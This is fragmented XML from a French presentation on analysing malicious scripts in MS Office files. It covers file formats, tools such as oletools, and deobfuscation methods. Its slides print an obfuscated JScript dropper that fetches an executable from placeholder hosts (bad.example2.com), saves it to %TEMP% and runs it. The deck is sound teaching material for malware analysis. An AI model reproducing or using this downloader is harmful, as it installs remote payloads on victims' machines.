              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replace(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err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(92)+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>107«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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G"+"E"+"T","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+""+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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[nasd8]+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cou"+""+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100+200-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)){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5596932" y="1436914"/>
            <a:ext cx="1145512" cy="33159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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="bad.example2.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B05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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\\’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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00B05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00B05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303770" y="3451943"/>
            <a:ext cx="2914650" cy="891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331720" y="3451943"/>
            <a:ext cx="3097530" cy="891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4675" y="1750212"/>
            <a:ext cx="861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Changer les noms des variables dans des noms sans signification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251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970" y="5724330"/>
            <a:ext cx="386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Solution : copier /remplacer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160" y="3591336"/>
            <a:ext cx="285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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = “abc”;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6650" y="3591336"/>
            <a:ext cx="252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var jkan43 = “abc”;</a:t>
            </a:r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5429250" y="3897672"/>
            <a:ext cx="18745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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="bad.example2.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF000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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\\’’+’’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nasd8=ld;nasd8&lt;nasdj.length;nasd8++)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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’://"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[nasd8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FF000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FF000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7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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad.example2.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF000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nasdi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nasmm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nasdi.ExpandEnvironmentStrings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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\\’’+’’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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naddk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nasbv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 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasd8=ld;nasd8&lt;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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.length;nasd8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++) {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naddk.open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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’://"+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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[nasd8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FF000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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+nasd8+</a:t>
            </a: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naddk.send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naddk.status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FF000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nasbv.open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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasbv.saveToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(nasmm+nasd8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+".exe",2);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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdi.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(nasmm+nasd8+".exe",1,0);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="99";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var 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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad.example2.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badder.example.com".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replace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nasdh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,'').split(" 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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WShell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WScript.CreateObject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WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fn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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.ExpandEnvironmentStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("%TEMP%")+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\\’’+’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>107’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ;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var 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WScript.CreateObject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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("MSXML2.XMLHTTP");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WScript.CreateObject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ADODB.Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 0;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for (var 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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.length;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’://"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sites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[i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>counter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+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"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=711791"+n, false);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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400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if (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fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>==(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)){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fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1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fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.saveToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+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+".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exe",2);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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exe",1,0); } }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7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2205" y="5311036"/>
            <a:ext cx="2428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UNE COUCHE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>A LA FOIS</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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00465" y="5311036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REFORMATER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>LE CODE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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73459" y="5311035"/>
            <a:ext cx="2843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EXECUTER DANS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>UN BAC A SABLE</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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68" y="1954438"/>
            <a:ext cx="2491832" cy="24918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25" y="1954438"/>
            <a:ext cx="2553285" cy="2553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06" y="2099615"/>
            <a:ext cx="2346655" cy="2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peepdf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5419491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3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Spidermonkey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8218502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8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7354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Scrips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>malveillants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>utilisation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0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Analyse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</a:t>
            </a:r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ms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office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Format des documents MS Office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Format des documents MS Office</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Outils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>d’analyse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Format des documents MS Office</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Outils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>d’analyse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Méthodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>d’analyse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Attaques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>contre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0384" y="5517026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MACROS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9148" y="551702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2411" y="5529145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VULNERABILITIES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15" y="2692139"/>
            <a:ext cx="1892617" cy="18926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44" y="2837105"/>
            <a:ext cx="1747651" cy="1747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87" y="2776135"/>
            <a:ext cx="1942795" cy="1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Scripts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880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Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324000" lvl="1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- VBA Macros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7834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Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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VBA Macros</a:t>
            </a:r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Commandes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5516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office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Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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VBA Macros</a:t>
            </a:r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Commandes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Fichiers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incorporés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39546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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> office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1894" y="5529145"/>
            <a:ext cx="294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     OFFICE OPENXML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Archive Zip contenant XML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            .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docm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7167" y="5529145"/>
            <a:ext cx="294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STRUCTURED STORAGE</a:t>
            </a:r>
          </a:p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           Format binaire</a:t>
            </a:r>
          </a:p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           .doc, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xls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, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ppt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1" y="2503148"/>
            <a:ext cx="2221389" cy="222138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27" y="2550830"/>
            <a:ext cx="2215782" cy="22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Scrips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>malveillants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>utilisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>malveillant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storage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10" y="1442312"/>
            <a:ext cx="8435340" cy="46333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0541" y="1757082"/>
            <a:ext cx="860612" cy="376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OLETOOLS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8761898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6016624" y="480060"/>
          <a:ext cx="5687695" cy="5649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openxml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3"/>
            <a:ext cx="1709159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  <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>ocument.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docx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Word\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
